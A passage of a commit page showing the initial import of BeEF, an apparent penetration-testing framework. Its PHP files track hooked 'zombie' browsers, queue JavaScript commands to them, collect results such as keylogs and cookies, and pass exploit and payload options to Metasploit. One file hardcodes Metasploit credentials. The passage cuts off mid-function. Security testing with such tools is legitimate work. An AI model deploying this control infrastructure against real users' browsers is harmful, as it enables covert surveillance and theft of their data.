Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Initial Import

Browse Source 
git-svn-id: https://beef.googlecode.com/svn/trunk@2 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
wade@bindshell.net
2010-01-11 00:54:08 +00:00
parent 11b1c899a5
commit 03ffb4703d
201 changed files with 18853 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

237
include/browserdetection.inc.php Normal file
View File

@@ -0,0 +1,237 @@
<?php
// Hit/Log tracker with Browser Lookup support.
// Browser Lookup by Geoffrey Sneddon, with some help from Clayton Smith.
// Rest of the script by Jordan S. C. Thompson (Hendee).
// Released under the zlib/libpng license.
// December 15, 2005
// This file's code should either be placed in the file you want it displayed or include it.
// If you include be sure to specify where the log files are in $dir.
// EXAMPLE OUTPUT
// Browser: Internet Explorer
// Browser Version: 6.0
// Operating System: Windows 98
// Internet Service Provider: Juno
// Site Hits: 65,485,455
$dir = "./";
$counterDB = "hits.dat";
$logDB = "log.dat";
$currentPage = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
function browser($ua)
{
if (preg_match('/bot/i', $ua) || preg_match('/crawl/i', $ua) || preg_match('/yahoo\!/i', $ua))
{
$return['name'] = 'Bot';
$return['version'] = 'Unknown';
}
elseif (preg_match('/opera/i', $ua))
{
preg_match('/Opera(\/| )([0-9\.]+)(u)?(\d+)?/i', $ua, $b);
$return['name'] = 'Opera';
unset($b[0], $b[1]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/msie/i', $ua))
{
preg_match('/MSIE ([0-9\.]+)(b)?/i', $ua, $b);
$return['name'] = 'Internet Explorer';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/omniweb/i', $ua))
{
preg_match('/OmniWeb\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'OmniWeb';
if (isset($b[1]))
$return['version'] = $b[1];
else
$return['version'] = 'Unknown';
}
elseif (preg_match('/icab/i', $ua))
{
preg_match('/iCab\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'iCab';
$return['version'] = $b[1];
}
elseif (preg_match('/Chrome/i', $ua))
{
$return['name'] = 'Chrome';
preg_match('/Chrome\/([0-9\.]+)/i', $ua, $b);
$return['version'] = $b[1];
}
elseif (preg_match('/safari/i', $ua))
{
preg_match('/Safari\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Safari';
$return['version'] = $b[1];
switch ($return['version'])
{
case '412':
case '412.2':
case '412.2.2':
$return['version'] = '2.0';
break;
case '412.5':
$return['version'] = '2.0.1';
break;
case '416.12':
case '416.13':
$return['version'] = '2.0.2';
break;
case '100':
$return['version'] = '1.1';
break;
case '100.1':
$return['version'] = '1.1.1';
break;
case '125.7':
case '125.8':
$return['version'] = '1.2.2';
break;
case '125.9':
$return['version'] = '1.2.3';
break;
case '125.11':
case '125.12':
$return['version'] = '1.2.4';
break;
case '312':
$return['version'] = '1.3';
break;
case '312.3':
case '312.3.1':
$return['version'] = '1.3.1';
break;
case '85.5':
$return['version'] = '1.0';
break;
case '85.7':
$return['version'] = '1.0.2';
break;
case '85.8':
case '85.8.1':
$return['version'] = '1.0.3';
break;
}
}
elseif (preg_match('/konqueror/i', $ua))
{
preg_match('/Konqueror\/([0-9\.]+)(\-rc)?(\d+)?/i', $ua, $b);
$return['name'] = 'Konqueror';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/Flock/i', $ua))
{
preg_match('/Flock\/([0-9\.]+)(\+)?/i', $ua, $b);
$return['name'] = 'Flock';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/firebird/i', $ua))
{
preg_match('/Firebird\/([0-9\.]+)(\+)?/i', $ua, $b);
$return['name'] = 'Firebird';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/phoenix/i', $ua))
{
preg_match('/Phoenix\/([0-9\.]+)(\+)?/i', $ua, $b);
$return['name'] = 'Phoenix';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/firefox/i', $ua))
{
preg_match('/Firefox\/([0-9\.]+)(\+)?/i', $ua, $b);
$return['name'] = 'Firefox';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/chimera/i', $ua))
{
preg_match('/Chimera\/([0-9\.]+)(a|b)?(\d+)?(\+)?/i', $ua, $b);
$return['name'] = 'Chimera';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/camino/i', $ua))
{
preg_match('/Camino\/([0-9\.]+)(a|b)?(\d+)?(\+)?/i', $ua, $b);
$return['name'] = 'Camino';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/seamonkey/i', $ua))
{
preg_match('/SeaMonkey\/([0-9\.]+)(a|b)?/i', $ua, $b);
$return['name'] = 'SeaMonkey';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/galeon/i', $ua))
{
preg_match('/Galeon\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Galeon';
$return['version'] = $b[1];
}
elseif (preg_match('/epiphany/i', $ua))
{
preg_match('/Epiphany\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Epiphany';
$return['version'] = $b[1];
}
elseif (preg_match('/mozilla\/5/i', $ua) || preg_match('/gecko/i', $ua))
{
preg_match('/rv(:| )([0-9\.]+)(a|b)?/i', $ua, $b);
$return['name'] = 'Mozilla';
unset($b[0], $b[1]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/mozilla\/4/i', $ua))
{
preg_match('/Mozilla\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Netscape';
$return['version'] = $b[1];
}
elseif (preg_match('/lynx/i', $ua))
{
preg_match('/Lynx\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Lynx';
$return['version'] = $b[1];
}
elseif (preg_match('/links/i', $ua))
{
preg_match('/Links \(([0-9\.]+)(pre)?(\d+)?/i', $ua, $b);
$return['name'] = 'Links';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/curl/i', $ua))
{
preg_match('/curl\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'cURL';
$return['version'] = $b[1];
}
elseif (preg_match('/wget/i', $ua))
{
preg_match('/Wget\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Wget';
$return['version'] = $b[1];
}
else
{
$return['name'] = 'Unknown';
$return['version'] = 'Unknown';
}
return $return;
}
?>

24
include/check_install.inc.php Normal file
View File

@@ -0,0 +1,24 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("filter.inc.php");
if(!file_exists('../include/config.inc.php')
&& !file_exists('../../include/config.inc.php')
&& !file_exists('../../../include/config.inc.php')) {
$install_url = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
if(valid_url_without_query($install_url)) {
echo "<script>location.href = '" . $install_url . "..'</script>";
echo '<li><a href="..">Configure BeEF</a></li>';
} else {
echo 'Install and configure BeEF first';
}
exit(0);
}
?>

157
include/common.inc.php Normal file
View File

@@ -0,0 +1,157 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("globals.inc.php");
// --[ BEEF_JS_ERROR
function beef_js_error($str) {
echo('<script>alert("' . $str . '")</script>');
}
// ---[ GET_B64_FILE
// returns the contents of a file in base64
function get_b64_file($file) {
$raw = file_get_contents($file);
$result = base64_encode($raw);
return $result;
}
// --[ BEEF_ERROR
function beef_error() {
echo ERROR_GENERIC;
exit;
}
// --[ GET_LOG
// returns the log file
function get_log() {
$raw = file_get_contents(LOG_FILE);
$log_data = "";
$log_data = html_encode_all($raw);
$log_data = convert_10_BR($log_data);
return $log_data;
}
// --[ GET_LOG
// returns the log file
function get_summary_log() {
$raw = file_get_contents(SUMMARY_LOG_FILE);
return $raw;
}
function convert_10_BR($str) {
return preg_replace('/&#10;/', "<br>", $str);
}
// --[ HTML_ENCODE_ALL
// html encodes all characters
function html_encode_all($str) {
$rtnstr = "";
$strlength = strlen($str);
for($i = 0; $i < $strlength; $i++){
$rtnstr .= "&#" . ord($str[$i]) . ";";
}
return $rtnstr;
}
// --[BEEF_LOG
// log an entry to the beef log
function beef_log($summary, $str) {
// below includes session info - for nat'ed browsers
$time_stamp = date("d/m/y H:i:s", time());
$zombie_id = md5(session_id());
// create full log
$log_entry = "[" . $time_stamp . " " . $_SERVER['REMOTE_ADDR'] . "] " . $str;
file_put_contents(LOG_FILE, $log_entry . "\n", FILE_APPEND);
//create summary log
if($summary != "") {
$time_stamp_link = "<a href=\"javascript:change_zombie('" . md5(session_id()) . "')\">" ;
$time_stamp_link .= "[" . $time_stamp . " " . $_SERVER['REMOTE_ADDR'] . "]</a>";
$safe_summary = html_encode_all($summary);
$safe_summary = convert_10_BR($safe_summary);
$log_entry = $time_stamp_link . "<br>" . $safe_summary;
file_start_put_contents(SUMMARY_LOG_FILE, $log_entry . "<br>");
}
}
function file_start_put_contents($file, $contents) {
$temp = tempnam(TMP_DIR, "delme");
touch($temp);
file_put_contents($temp, $contents, FILE_APPEND);
$raw = file_get_contents($file);
file_put_contents($temp, $raw, FILE_APPEND);
unlink($file);
copy($temp, $file);
unlink($temp);
}
if (!function_exists('file_put_contents')) {
define('FILE_APPEND', 1);
function file_put_contents($n, $d, $flag = false) {
$mode = ($flag == FILE_APPEND || strtoupper($flag) == 'FILE_APPEND') ? 'a' : 'w';
$f = @fopen($n, $mode);
if ($f === false) {
return 0;
} else {
if (is_array($d)) $d = implode($d);
$bytes_written = fwrite($f, $d);
fclose($f);
return $bytes_written;
}
}
}
// --[ MODULE_CODE_AND_RESULT_SETUP
// this sets up session details for the return of the results and
// constructs the code
function module_code_and_result_setup($cmd_file) {
// construct file location strings
$zombie_hook_dir = ZOMBIE_TMP_DIR . session_id();
// create a directory for this zombie if it doens't exist
if(!file_exists($zombie_hook_dir)) {
mkdir($zombie_hook_dir);
}
$zombie_hook_cmd_file = $zombie_hook_dir . "/" . CMD_FILENAME;
$zombie_hook_res_file = $zombie_hook_dir . "/" . RES_FILENAME;
$zombie_hook_res_loc_file = $zombie_hook_dir . "/" . RES_LOC_FILENAME;
// set the location of the results file in the session
$result_id = md5(rand());
$_SESSION[$result_id] = $zombie_hook_res_file;
// determine where to put the results
if(file_exists($zombie_hook_res_loc_file)) {
$res_loc_arr = file($zombie_hook_res_loc_file);
$_SESSION[$result_id] = MODULE_TMP_DIR . $res_loc_arr[0];
$_SESSION['append'] = 1;
unlink($zombie_hook_res_loc_file);
} else {
$_SESSION[$result_id] = $zombie_hook_res_file;
$_SESSION['append'] = 0;
}
// get the javascript command file
$cmd_file_content = file_get_contents($cmd_file);
// return javascript string to set result_id
$js_result_id_code ="var result_id = '$result_id';\n";
return $js_result_id_code . $cmd_file_content;
}
?>

26
include/filter.inc.php Normal file
View File

@@ -0,0 +1,26 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
function valid_ip($ip) {
return filter_var($ip, FILTER_VALIDATE_IP);
}
function valid_port($port) {
$int_options = array("options"=>array("min_range"=>0, "max_range"=>65535));
return filter_var($port, FILTER_VALIDATE_INT, $int_options);
}
function valid_url($url) {
if( preg_match("/\.\./", $url) ) return FALSE;
if( ! preg_match("/^[a-zA-Z0-9\._:\/]*$/", $url) ) return FALSE;
return filter_var($url, FILTER_VALIDATE_URL, FILTER_FLAG_SCHEME_REQUIRED);
}
function valid_url_without_query($url) {
if(filter_var($url, FILTER_FLAG_QUERY_REQUIRED)) return FALSE;
return valid_url($url);
}
?>

112
include/globals.inc.php Normal file
View File

@@ -0,0 +1,112 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
// if check_install.inc.php works this should exist
require_once("check_install.inc.php");
require_once("config.inc.php");
// files and directories
// module
define('MODULE_DIR', BASE_DIR . "modules/");
define('MODULE_STANDARD_SUBDIR', "standard");
define('MODULE_BROWSER_SUBDIR', "browser");
define('MODULE_NETWORK_SUBDIR', "network");
define('MODULE_INTERPROTOCOL_SUBDIR', "interprotocol");
define('MODULE_STANDARD_DIR', MODULE_DIR . MODULE_STANDARD_SUBDIR . "/");
define('MODULE_BROWSER_DIR', MODULE_DIR . MODULE_BROWSER_SUBDIR . "/");
define('MODULE_NETWORK_DIR', MODULE_DIR . MODULE_NETWORK_SUBDIR . "/");
define('MODULE_INTERPROTOCOL_DIR', MODULE_DIR . MODULE_INTERPROTOCOL_SUBDIR . "/");
// temp
define('TMP_DIR', BASE_DIR . "cache/");
define('ZOMBIE_TMP_DIR', TMP_DIR . "zombies/");
define('AUTORUN_TMP_DIR', TMP_DIR . "autorun/");
define('MODULE_TMP_DIR', TMP_DIR . "modules/");
define('AUTORUN_TMP_FILENAME', "autorun.js");
// other
define('JAVASCRIPT_DIR', BASE_DIR . "js/");
define('CMD_FILE', TMP_DIR . "cmd.js");
define('CMD_FILE_BAK', TMP_DIR . "cmd.js.bak");
define('CMD_RESULT_FILE', TMP_DIR . "cmd.res");
define('CMD_RESULT_FILE_BAK', TMP_DIR . "cmd.res.bak");
define('HEARTBEAT_FILE', TMP_DIR . "heartbeat");
define('HEARTBEAT_FILENAME', "heartbeat");
define('KEYLOG_FILENAME', "keylog");
define('SCREEN_FILENAME', "screen");
define('HTML_FILENAME', "content.html");
define('COOKIE_FILENAME', "cookie.txt");
define('LOC_FILENAME', "loc.txt");
define('RES_LOC_FILENAME', "res_loc");
define('CLIPBOARD_FILENAME', "clipboard.txt");
define('CMD_FILENAME', "cmd");
define('RES_FILENAME', "result");
define('MODULE_NAME_FILENAME', "name.txt");
define('BASE64_JAVASCRIPT_FILE', JAVASCRIPT_DIR . "base64.js");
define('BASE64REPLACE_JAVASCRIPT_FILE', JAVASCRIPT_DIR . "base64replace.js");
define('HEARTBEAT_TIME', "10000");
define('HEARTBEAT_FREQUENCY', 5);
define('SUMMARY_LOG_HEARTBEAT_FREQUENCY', 3);
// session
define('SESSION_NAME', "BeEFSession");
// strings
define('DNA_STRING', "Data not available");
define('ERROR_GENERIC', "Error ");
// zombies (sidebar)
define('ZOMBIE_NONE', '<li><a href="#">None Connected</a></li>');
define('ZOMBIE_IMG_ATT', ' width="12" height="12" align="top" border="0"');
define('ZOMBIE_UA_IMG_TAG', '<img src="../images/AGENT"' . ZOMBIE_IMG_ATT . '>');
define('ZOMBIE_OS_IMG_TAG', '<img src="../images/OS"' . ZOMBIE_IMG_ATT . '>');
define('ZOMBIE_IP_TAG', '<div id="zombietext">IPADDRESS</div>');
define('ZOMBIE_CHANGE_HREF', '<a href="javascript:change_zombie(\'ZOMBIE\')">');
define('ZOMBIE_NOT_SEL_TAG', '<div id=\'zombies\'>');
define('ZOMBIE_SEL_TAG', '<div id=\'zombiessel\'>');
define('ZOMBIE_LINK', ZOMBIE_NOT_SEL_TAG . ZOMBIE_CHANGE_HREF . ZOMBIE_UA_IMG_TAG .
ZOMBIE_OS_IMG_TAG . ZOMBIE_IP_TAG . '</a></div>');
define('ZOMBIE_LINK_SEL', ZOMBIE_SEL_TAG . ZOMBIE_CHANGE_HREF . ZOMBIE_UA_IMG_TAG .
ZOMBIE_OS_IMG_TAG . ZOMBIE_IP_TAG . '</a></div>');
define('MODULE_BUTTON_HTML', '<input class="button" type="button" value="NAME" ' .
'onClick="change_module(\'../modules/PATH/\')"/>' . "\n");
define('MODULE_MENU_ITEM_HTML', '<li><a href="#" onClick="change_module(\'PATH\')">NAME</a></li>');
// install
define('INSTALL_WARNING_TEXT', 'ERROR: BeEF may not have been installed correctly.Edit the "' .
'define(\'BASE_DIR\', "/var/.../htdocs/beef/");' .
' line of the \'globals.inc.php\' file in the \'include\' dirrctory and point' .
' this value at the BeEf install directory.');
define('INSTALL_WARNING', '<font size="4" color="red">' . INSTALL_WARNING_TEXT . '</font>');
// agents
define('AGENT_UNKNOWN_IMG', "unknown.png");
define('AGENT_FIREFOX_UA_STR', "Firefox");
define('AGENT_FIREFOX_IMG', "firefox.png");
define('AGENT_MOZILLA_UA_STR', "Mozilla");
define('AGENT_MOZILLA_IMG', "mozilla.png");
define('AGENT_IE_UA_STR', "Internet Explorer");
define('AGENT_IE_IMG', "msie.png");
define('AGENT_SAFARI_UA_STR', "Safari");
define('AGENT_SAFARI_IMG', "safari.png");
define('AGENT_KONQ_UA_STR', "Konqueror");
define('AGENT_KONQ_IMG', "konqueror.png");
define('AGENT_CHROME_UA_STR', "Chrome");
define('AGENT_CHROME_IMG', "chrome.png");
// os'es
define('OS_UNKNOWN_IMG', "unknown.png");
define('OS_WINDOWS_UA_STR', "Windows");
define('OS_WINDOWS_IMG', "win.png");
define('OS_LINUX_UA_STR', "Linux");
define('OS_LINUX_IMG', "linux.png");
define('OS_MAC_UA_STR', "Mac");
define('OS_MAC_IMG', "mac.png");
?>

65
include/hook.inc.php Normal file
View File

@@ -0,0 +1,65 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../include/globals.inc.php");
require_once("../include/browserdetection.inc.php");
// --[ EXTRACT_OS
function extract_os() {
$user_parts = explode(";", $_SERVER['HTTP_USER_AGENT']);
$os = trim($user_parts[2]);
$os = str_replace(')', '', $os);
return $os;
}
// ---[ GET_UA_DETAILS
function get_ua_details() {
$ip = $_SERVER['REMOTE_ADDR'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$browser = browser($_SERVER['HTTP_USER_AGENT']);
$os = extract_os();
// return the collected useragent details
return $ip . "\n" .
$browser['name'] . "\n" .
$browser['version'] . "\n" .
$os . "\n" .
$agent;
}
// ---[ REGISTER_HEARTBEAT
function register_heartbeat($status, $result) {
// construct file location strings
$zombie_hook_dir = ZOMBIE_TMP_DIR . session_id();
$zombie_hook_heartbeat_file = $zombie_hook_dir . "/" . HEARTBEAT_FILENAME;
$zombie_hook_cmd_file = $zombie_hook_dir . "/" . CMD_FILENAME;
$zombie_hook_res_file = $zombie_hook_dir . "/" . RES_FILENAME;
// create a directory for this zombie if it doens't exist
if(!file_exists($zombie_hook_dir)) {
mkdir($zombie_hook_dir);
}
// heartbeat
// write the heartbeat details to file
file_put_contents($zombie_hook_heartbeat_file, get_ua_details());
// if there is a result write it to file
if($status != HEARTBEAT_NOP) {
file_put_contents($zombie_hook_res_file, $result);
}
if(!file_exists($zombie_hook_cmd_file)) { return 0; }
// get the command from $zombie_hook_cmd_file
$lines = file($zombie_hook_cmd_file);
unlink($zombie_hook_cmd_file);
return join("\n", $lines);
}
?>

7
include/msf.inc.php Normal file
View File

@@ -0,0 +1,7 @@
<?php
define('MSF_HOST', '127.0.0.1');
define('MSF_PORT', '55553');
define('MSF_USER', 'msf');
define('MSF_PASS', 'BeEFMSFPass');
define('MSF_BASE_URL', 'http://192.168.1.235');
?>

134
include/msf_filter.inc.php Normal file
View File

@@ -0,0 +1,134 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("filter.inc.php");
function get_and_filter_exploit() {
$exploit = $_GET["exploit"];
if(strlen($exploit) > 50) {
return FALSE;
}
if( !( preg_match("/multi\/browser\/[a-z_]+/", $exploit) ||
preg_match("/osx\/browser\/[a-z_]+/", $exploit) ||
preg_match("/windows\/browser\/[a-z_]+/", $exploit)) ) {
return FALSE;
}
return $exploit;
}
function get_and_filter_payload() {
$payload = $_GET["payload"];
if(strlen($payload) > 50) {
return FALSE;
}
if( !preg_match("/[a-z_]+\/[a-z_]+[\/[a-z_]+]{0,1}/", $payload) ) {
return FALSE;
}
return $payload;
}
function valid_exitfunc($func) {
if ( ($func == "seh") || ($func == "thread") || ($func == "process") ) {
return true;
}
return true;
}
function valid_srvhost($ip) {
return valid_ip($ip);
}
function valid_srvport($port) {
return valid_port($port);
}
function valid_urlpath($path) {
if( ! preg_match("/^[a-zA-Z0-9\/\.]*$/", $path) ) return FALSE;
return TRUE;
}
function get_and_filter_smb_capture_options() {
$options = array();
// SRVHOST
if(!$_GET["SRVHOST"]) return FALSE;
if(!valid_ip($_GET["SRVHOST"])) return FALSE;
$options["SRVHOST"] = $_GET["SRVHOST"];
// SRVPORT
if(!$_GET["SRVPORT"]) return FALSE;
if(!valid_port($_GET["SRVPORT"])) return FALSE;
$options["SRVPORT"] = $_GET["SRVPORT"];
// URIPATH
if($_GET["URIPATH"]) {
if(!valid_urlpath($_GET["URIPATH"])) return FALSE;
$options["URIPATH"] = $_GET["URIPATH"];
}
return $options;
}
function get_and_filter_module_options() {
$options = array();
// PAYLOAD
$options["PAYLOAD"] = get_and_filter_payload();
// SRVHOST
if(!$_GET["SRVHOST"]) return FALSE;
if(!valid_ip($_GET["SRVHOST"])) return FALSE;
$options["SRVHOST"] = $_GET["SRVHOST"];
// SRVPORT
if(!$_GET["SRVPORT"]) return FALSE;
if(!valid_port($_GET["SRVPORT"])) return FALSE;
$options["SRVPORT"] = $_GET["SRVPORT"];
// LPORT
if($_GET["LPORT"]) {
if(!valid_port($_GET["LPORT"])) return FALSE;
$options["LPORT"] = $_GET["LPORT"];
}
// RHOST
if($_GET["RHOST"]) {
if(!valid_ip($_GET["RHOST"])) return FALSE;
$options["RHOST"] = $_GET["RHOST"];
}
// LHOST
if($_GET["LHOST"]) {
if(!valid_ip($_GET["LHOST"])) return FALSE;
$options["LHOST"] = $_GET["LHOST"];
}
// URIPATH
if($_GET["URIPATH"]) {
if(!valid_urlpath($_GET["URIPATH"])) return FALSE;
$options["URIPATH"] = $_GET["URIPATH"];
}
// EXITFUNC
if($_GET["EXITFUNC"]) {
if(!valid_exitfunc($_GET["EXITFUNC"])) return FALSE;
$options["EXITFUNC"] = $_GET["EXITFUNC"];
}
return $options;
}
?>

96
include/ui_module.inc.php Normal file
View File

@@ -0,0 +1,96 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
// ---[ GET_MODULE_BUTTONS_HTML
// usage: get_module_button_html(button name/lable, browser request path)
function get_module_button_html($name, $path) {
$result = MODULE_BUTTON_HTML;
$result = str_replace("NAME", $name, $result); // button name
$result = str_replace("PATH", $path, $result); // path to module
return $result;
}
function get_module_menu_item_html($name, $path) {
$result = MODULE_MENU_ITEM_HTML;
$result = str_replace("NAME", $name, $result); // button name
$result = str_replace("PATH", $path, $result); // path to module
return $result;
}
// --[ GET_STANDARD_MODULE_MENU
function get_standard_module_menu() {
$menu_str .= get_module_menu(MODULE_STANDARD_DIR, MODULE_STANDARD_SUBDIR);
return $menu_str;
}
// --[ GET_BROWSER_MODULE_MENU
function get_browser_module_menu() {
$menu_str .= get_module_menu(MODULE_BROWSER_DIR, MODULE_BROWSER_SUBDIR);
return $menu_str;
}
// --[ GET_BROWSER_MODULE_MENU
function get_network_module_menu() {
$menu_str .= get_module_menu(MODULE_NETWORK_DIR, MODULE_NETWORK_SUBDIR);
return $menu_str;
}
// --[ GET_INTERPROTOCOL_MODULE_MENU
function get_interprotocol_module_menu() {
$menu_str .= get_module_menu(MODULE_INTERPROTOCOL_DIR, MODULE_INTERPROTOCOL_SUBDIR);
return $menu_str;
}
// ---[ GET_MODULE_MENU
function get_module_menu($module_dir, $module_subdir) {
$result = "";
$wildcard = $module_dir . '*';
// iterate through the module directories
foreach (glob($wildcard) as $dirname) {
// get module name from file
$name = file_get_contents($dirname . '/' . MODULE_NAME_FILENAME);
// create html module buttons
$result .= get_module_menu_item_html(trim($name), "/beef/modules/". $module_subdir . "/" . basename($dirname));
}
return $result;
}
// ---[ GET_ALL_MODULE_BUTTONS_HTML
function get_all_module_menu_items_html() {
$result = "";
$wildcard = MODULE_SYMMETRIC_DIR . '*';
// iterate through the module directories
foreach (glob($wildcard) as $dirname) {
// get module name from file
$name = join("\n", file($dirname . '/' . MODULE_NAME_FILENAME));
// create html module buttons
$result .= get_module_menu_item_html(trim($name), "/beef/modules/symmetric/" . basename($dirname));
}
return $result;
}
// ---[ GET_ALL_MODULE_BUTTONS_HTML
function get_all_module_buttons_html() {
$result = "";
$wildcard = MODULE_SYMMETRIC_DIR . '*';
// iterate through the module directories
foreach (glob($wildcard) as $dirname) {
// get module name from file
$name = join("<br>", file($dirname . '/' . MODULE_NAME_FILENAME));
// create html module buttons
$result .= get_module_button_html(trim($name), "/symmetric/" . basename($dirname));
}
return $result;
}
?>

230
include/ui_zombie.inc.php Normal file
View File

@@ -0,0 +1,230 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("globals.inc.php");
require_once("browserdetection.inc.php");
require_once("common.inc.php");
// ---[ GET_ZOMBIE_OS
// the output of this function must be escaped
function get_zombie_os($zombie_id) {
$heartbeat_file = ZOMBIE_TMP_DIR . $_SESSION[$zombie_id] . "/" . HEARTBEAT_FILENAME;
$zombie_heartbeat_contents = file($heartbeat_file);
return $zombie_heartbeat_contents[3];
}
// ---[ GET_ZOMBIE_BROWSER
// the output of this function must be escaped
function get_zombie_browser($zombie_id) {
$heartbeat_file = ZOMBIE_TMP_DIR . $_SESSION[$zombie_id] . "/" . HEARTBEAT_FILENAME;
$zombie_heartbeat_contents = file($heartbeat_file);
return trim($zombie_heartbeat_contents[1]) . " " . trim($zombie_heartbeat_contents[2]);
}
// ---[ GET_ZOMBIE_METADATA
function get_zombie_metadata($zombie_id) {
$heartbeat_file = ZOMBIE_TMP_DIR . $_SESSION[$zombie_id] . "/" . HEARTBEAT_FILENAME;
$zombie_details = get_zombie_data($heartbeat_file);
$zombie_data = trim($zombie_details['ip']);
$zombie_data .= ',' . $zombie_details['agent_image'];
$zombie_data .= ',' . $zombie_details['os_image'];
return $zombie_data;
}
// ---[ GET_ZOMBIE_IP
function get_zombie_ip($zombie_id) {
$heartbeat_file = ZOMBIE_TMP_DIR . $_SESSION[$zombie_id] . "/" . HEARTBEAT_FILENAME;
$zombie_details = get_zombie_data($heartbeat_file);
return trim($zombie_details['ip']);
}
// --[ GET_ZOMBIE_VAR
function get_zombie_var() {
if(!isset($_GET["zombie"])) { beef_error('no zombie submitted'); }
$zombie = $_GET["zombie"];
if(!isset($_SESSION[$zombie])) { beef_error('zombie not in session'); }
return $zombie;
}
// --[ GET_ZOMBIE_DATAFILE
function get_zombie_datafile($filename) {
$zombie = get_zombie_var();
$zombie_dir = ZOMBIE_TMP_DIR . $_SESSION[$zombie];
$zombie_file = $zombie_dir . "/" . $filename;
if(!file_exists($zombie_file)) {
return DNA_STRING;
}
return file_get_contents($zombie_file);
}
// --[ DELETE_ZOMBIE_RESULTS
function delete_zombie_results() {
$zombie = get_zombie_var();
$zombie_dir = ZOMBIE_TMP_DIR . $_SESSION[$zombie];
$zombie_file = $zombie_dir . "/" . RES_FILENAME;
if(file_exists($zombie_file)) {
unlink($zombie_file);
}
}
// ---[ GET_ZOMBIE_LIST
function get_zombie_list() {
$result = "";
// check installed properly
if(!file_exists(BASE_DIR)) {
return INSTALL_WARNING;
}
$d = opendir(ZOMBIE_TMP_DIR);
if(!$d) return false;
// iterate through directory and parse the heartbeat files
while($dir_name = readdir($d)) {
if(!is_dir(ZOMBIE_TMP_DIR . $dir_name)) { continue; } // skip files
$heartbeat_file = ZOMBIE_TMP_DIR . $dir_name . "/" . HEARTBEAT_FILENAME;
if(!file_exists($heartbeat_file)) { continue; } // check heartbeat exists
// check that the heartbeat file is within the age window (HEARTBEAT_TIME)
$filetime = date("U",filemtime($heartbeat_file));
if((time() - $filetime) < ((HEARTBEAT_TIME/1000)+1)) {
// parse zombie details into $zombie_details
$_SESSION[md5($dir_name)] = $dir_name;
$zombie_details = get_zombie_data($heartbeat_file);
$zombie_details['id'] = md5($dir_name);
if(!empty($result)) $result .= ",";
$result .= $zombie_details['id'];
} else {
// this means the zombie has been lost
// leave history/details in directory
}
}
closedir($d);
// if no zombies return the default value
if($result == "") { $result = 'none'; }
return $result;
}
// --[ GET_ZOMBIE_MENU
function get_zombie_menu() {
$result = "";
// check installed properly
if(!file_exists(BASE_DIR)) {
return INSTALL_WARNING;
}
$d = opendir(ZOMBIE_TMP_DIR);
if(!$d) return false;
// iterate through directory and parse the heartbeat files
while($dir_name = readdir($d)) {
if(!is_dir(ZOMBIE_TMP_DIR . $dir_name)) { continue; } // skip files
$heartbeat_file = ZOMBIE_TMP_DIR . $dir_name . "/" . HEARTBEAT_FILENAME;
if(!file_exists($heartbeat_file)) { continue; } // check heartbeat exists
// check that the heartbeat file is within the age window (HEARTBEAT_TIME)
$filetime = date("U",filemtime($heartbeat_file));
if((time() - $filetime) < ((HEARTBEAT_TIME/1000)+1)) {
// parse zombie details into $zombie_details
$_SESSION[md5($dir_name)] = $dir_name;
$zombie_details = get_zombie_data($heartbeat_file);
$zombie_details['id'] = trim(md5($dir_name));
$result .= '<li><a href="javascript:change_zombie(\'' . $zombie_details['id'] . '\')">' .
'<img src="/beef/images/' . $zombie_details['agent_image'] . '" align="top" border="0" height="12" width="12" vspace="2"> ' .
'<img src="/beef/images/' . $zombie_details['os_image'] . '" align="top" border="0" height="12" width="12" vspace="2"> ' .
$zombie_details['ip'] . '</a></li>';
} else {
// this means the zombie has been lost
// leave history/details in directory
}
}
closedir($d);
// if no zombies return the default value
if($result == "") { $result = ZOMBIE_NONE; }
return $result;
}
// ---[ GET_ZOMBIE_DATA
function get_zombie_data($file){
$browser_details = file_get_contents($file);
$zombie_data['ip'] = extract_zombie_ip($browser_details);
$zombie_data['agent_image'] = extract_zombie_useragent($browser_details);
